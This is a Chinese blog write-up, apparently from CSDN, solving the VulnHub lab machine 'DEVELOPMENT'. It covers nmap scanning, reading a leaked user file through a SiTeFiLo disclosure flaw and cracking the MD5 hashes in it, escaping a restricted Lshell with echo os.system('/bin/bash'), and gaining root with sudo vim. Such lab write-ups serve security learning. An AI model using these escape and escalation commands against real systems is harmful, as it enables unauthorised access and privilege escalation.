码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • vulnhub digitalworld.local: DEVELOPMENT


    写在最前面:

    这个靶机真的很烦,有入侵检测系统的,动不动就连不上了TAT

    不要扫描!!

    不要尝试远程文件包含!!

    万一连不上了,那就重启靶机吧……

    渗透思路:

    nmap扫描----根据网页和注释中的各种提示找到developmentsecretpage----利用Simple Text-File Login script(slogin_lib.inc.php)的敏感信息泄露获得用户ssh密码----绕过Lshell----vim/nano sudo提权

    环境信息:

    靶机:192.168.101.79

    攻击机:192.168.101.34

    具体步骤:

    1、nmap扫描

    sudo nmap -sV -sC -p- 192.168.101.79

    发现TCP端口22(ssh)、113(不知道啥)、139和445(smb相关)、8080(http)

    2、发现developmentsecretpage

    浏览器访问http://192.168.101.79:8080/看到下面的页面

    其中有两个重要的提示:

    1、可以在html_pages看到部分项目

    There are many projects in this box. View some of these projects at html_pages.

    2、靶机有入侵检测系统。这就是扫描、远程文件包含、ssh用户登录失败导致靶机无法连接的原因。

    WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to patrick@goodtech.com.sg.

    查看网页源代码,发现注释中提示寻找development secret page,还发现一个人名Patrick

    <!-- Searching for development secret page... where could it be? -->

    <!-- Patrick, Head of Development-->

    浏览器访问http://192.168.101.79:8080/html_pages,发现一些文件名

    其中http://192.168.101.79:8080/about.html包含另一个人名David(后来发现没啥用)

    浏览器访问http://192.168.101.79:8080/development.html,并查看网页源代码,发现注释中提供了development secret page的路径./developmentsecretpage

    <!-- You tried harder! Visit ./developmentsecretpage. -->

    3、利用Simple Text-File Login script(slogin_lib.inc.php)的敏感信息泄露获得用户ssh密码

    浏览器访问http://192.168.101.79:8080/developmentsecretpage/

    点击Patrick's来到http://192.168.101.79:8080/developmentsecretpage/patrick.php

    点击sitemap来到http://192.168.101.79:8080/developmentsecretpage/sitemap.php

    点击Click here to log out来到一个登录页面http://192.168.101.79:8080/developmentsecretpage/sitemap.php?logout=1

    随便输入用户名和密码,点Enter,发现下图前两行所示报错信息,表明登录服务用到了slogin_lib.inc.php

    google搜索slogin_lib.inc.php,发现已知漏洞

    Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion - PHP webapps Exploit

    根据该敏感信息泄露漏洞描述,在浏览器中访问http://192.168.101.79:8080/developmentsecretpage/slog_users.txt

    发现4个用户名和md5加密的密码

    admin, 3cb1d13bb83ffff2defe8d1443d3a0eb

    intern, 4a8a2b374f463b7aedbb44a066363b81

    patrick, 87e6d56ce79af90dbe07d387d3d0579e

    qiu, ee64497098d0926d198f54f6d5431f98

    在网站MD5免费在线解密破解_MD5在线加密-SOMD5进行解密,admin的密码解不出来,其他三组用户名密码如下

    intern 12345678900987654321

    patrick P@ssw0rd25

    qiu qiu

    4、绕过Lshell

    分别尝试用这三个用户进行ssh登录,只有intern可以登录

    ssh intern@192.168.101.79

    intern登录之后发现只能执行上图中的几个命令

    google搜索 cd clear echo exit help ll lpath ls 发现是Lshell,并搜索到多种Lshell的绕过方式,

    比如下面两条命令都可以

    1. echo os.system('/bin/bash')
    2. echo && 'bash'

    (绕过Lshell后输入env查看SHELL参数值,发现果然是lshell)

    Lshell绕过方法和漏洞原因详见

    Lshell - aldeid

    #834949 - lshell: CVE-2016-6902: Shell outbreak due to bad syntax parse - Debian Bug report logs

    python - Why does "echo os.system('/bin/bash')" work? - Unix & Linux Stack Exchange

    5、vim/nano sudo提权

    进入到/home目录发现除了intern还有用户admin和patrick

    admin的密码不知道,patrick的密码是知道的(步骤3),用su命令切换到patrick

    su - patrick

    执行sudo -l发现patrick可以sudo执行vim和nano,这两个命令都可以sudo提权

    vim提权方法如该网页所示vim | GTFOBins

    命令行输入

    sudo vim -c ':!/bin/bash'

    即可得到root的shell

    nano提权方法见nano | GTFOBins

    由于分了好几步,就不每步都截图了,最后效果如下图所示

  • 相关阅读:
    自动化运维平台-OpManager
    android 存储新特性
    React TypeScript 样式报错
    MVCC及实现原理
    SpringCloudSleuth异步线程支持和传递
    OpenglEs之三角形绘制
    CUTLASS 1.3.3中的 Volta884_h884gemm
    基于惯性权值非线性递减的改进粒子群算法 - 附代码
    融合GPT大模型产品,WakeData新一轮产品升级
    MATLAB环境下基于离散小波变换的体外血管图像处理
  • 原文地址:https://blog.csdn.net/elephantxiang/article/details/125608463
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号